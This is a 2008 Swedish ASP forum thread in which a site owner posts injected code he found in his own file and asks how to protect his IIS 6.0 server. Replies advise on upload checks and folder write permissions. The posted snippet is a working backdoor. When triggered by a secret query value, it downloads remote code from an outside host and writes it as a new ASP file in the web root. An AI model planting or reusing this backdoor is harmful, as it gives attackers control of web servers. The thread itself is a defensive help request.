Fetstil Fetstil Kursiv Understrykning linje färgläggning tabellverk Punktlista Nummerlista Vänster Centrerat högerställt Utfyllt Länk Bild htmlmode
  • Forum & Blog
    • Forum - översikt
      • .Net
        • asp.net generellt
        • c#
        • vb.net
        • f#
        • silverlight
        • microsoft surface
        • visual studio .net
      • databaser
        • sql-server
        • databaser
        • access
        • mysql
      • mjukvara klient
        • datorer och komponenter
        • nätverk, lan/wan
        • operativsystem
        • programvaror
        • säkerhet, inställningar
        • windows server
        • allmänt
        • crystal reports
        • exchange/outlook
        • microsoft office
      • mjukvara server
        • active directory
        • biztalk
        • exchange
        • linux
        • sharepoint
        • webbservers
        • sql server
      • appar (win/mobil)
      • programspråk
        • c++
        • delphi
        • java
        • quick basic
        • visual basic
      • scripting
        • asp 3.0
        • flash actionscript
        • html css
        • javascript
        • php
        • regular expresssion
        • xml
      • spel och grafik
        • DirectX
        • Spel och grafik
      • ledning
        • Arkitektur
        • Systemutveckling
        • krav och test
        • projektledning
        • ledningsfrågor
      • vb-sektioner
        • activeX
        • windows api
        • elektronik
        • internet
        • komponenter
        • nätverk
        • operativsystem
      • övriga forum
        • arbete karriär
        • erbjuda uppdrag och tjänster
        • juridiska frågor
        • köp och sälj
        • matematik och fysik
        • intern information
        • skrivklåda
        • webb-operatörer
    • Posta inlägg i forumet
    • Chatta med andra
  • Konto
    • Medlemssida
    • Byta lösenord
    • Bli bonsumedlem
    • iMail
  • Material
    • Tips & tricks
    • Artiklar
    • Programarkiv
  • JOBB
  • Student
    • Studentlicenser
  • KONTAKT
    • Om pellesoft
    • Grundare
    • Kontakta oss
    • Annonsering
    • Partners
    • Felanmälan
  • Logga in

Hem / Forum översikt / inlägg

Posta nytt inlägg


Hacking kod i asp fil

Postades av 2008-07-23 00:07:08 - Hassan Fakhro, i forum asp - allmänt, Tråden har 4 Kommentarer och lästs av 1507 personer

Hej,
Idag när jag skulle ändra en banner på min ena fil så märkte jag en asp text som inte jag har skrivit.
Den ledde till någon xlm fil för att kunna ladda upp filer på min server.

Deras script ledde till denna xlm fil:
http://max.wal.ifrance.com/asp.txt

Min fråga är, hur gick detta till och hur skyddar jag mig mot dessa idiot folk?
Jag har en egen dedicerande server med IIS 6.0

Tacksam för svar.


Svara

Sv: Hacking kod i asp fil

Postades av 2008-07-23 00:30:33 - Hassan Fakhro

så såg koden ut i min fil:

<code>
<%
If Request.QueryString("kat") = "max007" Then
%>

<%Response.Buffer = true%>
<%Dim objXMLHTTP, xml, text%>
<%Set xml = Server.CreateObject ("Microsoft.XMLHTTP")%>
<%xml.Open "GET", "http://max.wal.ifrance.com/asp.txt", false%>
<%xml.Send%>
<%text = xml.ResponseText%><%Response.write(text)%>
<%dim fs,tfile%>
<%set fs=Server.CreateObject("Scripting.FileSystemObject")%>
<%set tfile=fs.CreateTextFile("c:\inetpub\wwwroot\ara\images\errors.asp")%><%tfile.WriteLine(text)%><%tfile.close%>
<%set tfile=nothing%>
<%set fs=nothing%>
<%Set xml = Nothing%>
<% End If %>
</code>


Svara

Sv: Hacking kod i asp fil

Postades av 2008-07-23 09:50:30 - Johan Djupmarker

En vild gissning bara... Kan det vara så att du tillåter filuppladdning till servern utan att kontrollera filändelsen? Tillåter du exekvering av script i mappen filerna laddas upp till? Om så är fallet kan någon ladda upp en asp-fil och sedan exekvera den, angriparen kan alltså göra "allt" på din server.

Om någon av dina asp-filer är modifierade så tyder det också på att du har lite tokiga rättigheter. Användaren som IIS kör under ska INTE ha tillåtelse att skriva tilll filer i mappar där din website ligger (enbart till mappar där du sparar uppladdat material.

/Johan


Svara

Sv:Hacking kod i asp fil

Postades av 2008-07-23 11:21:19 - Hassan Fakhro

Hej,
Jag tillåter endast uppladdning av bild, och där tillåts endast jpg och gif.
Det som har hänt är att han modifierat ett av mina egna asp script och lagt till denna kodsnutt.


Svara

Sv: Hacking kod i asp fil

Postades av 2008-07-23 11:25:12 - Hassan Fakhro

jag har ändrat nu i min wwwroot katalog att endast Read, logg visits och index this resource är tillåten, innan fanns write med, men den har jag avmarkerat nu.


Svara

Nyligen

  • 09:09 Vill du köpa medicinska tester?
  • 12:47 Vem beviljar assistansen – kommune
  • 14:17 Någon med erfarenhet av hemstädnin
  • 14:14 Bör man använda sig av en båtförme
  • 14:12 Finns det någon intressant hundblo
  • 14:25 Tips på verktyg för att skapa QR-k
  • 14:23 Tips på verktyg för att skapa QR-k
  • 20:52 Fungerer innskuddsbonuser egentlig

Sidor

  • Hem
  • Bli bonusmedlem
  • Läs artiklar
  • Chatta med andra
  • Sök och erbjud jobb
  • Kontakta oss
  • Studentlicenser
  • Skriv en artikel

Statistik

Antal besökare:
Antal medlemmar:
Antal inlägg:
Online:
På chatten:
4 569 153
27 952
271 704
796
0

Kontakta oss

Frågor runt konsultation, rådgivning, uppdrag, rekrytering, annonsering och övriga ärenden. Ring: 0730-88 22 24 | pelle@pellesoft.se

© 1986-2013 PelleSoft AB. Last Build 4.1.7169.18070 (2019-08-18 10:02:21) 4.0.30319.42000
  • Om
  • Kontakta
  • Regler
  • Cookies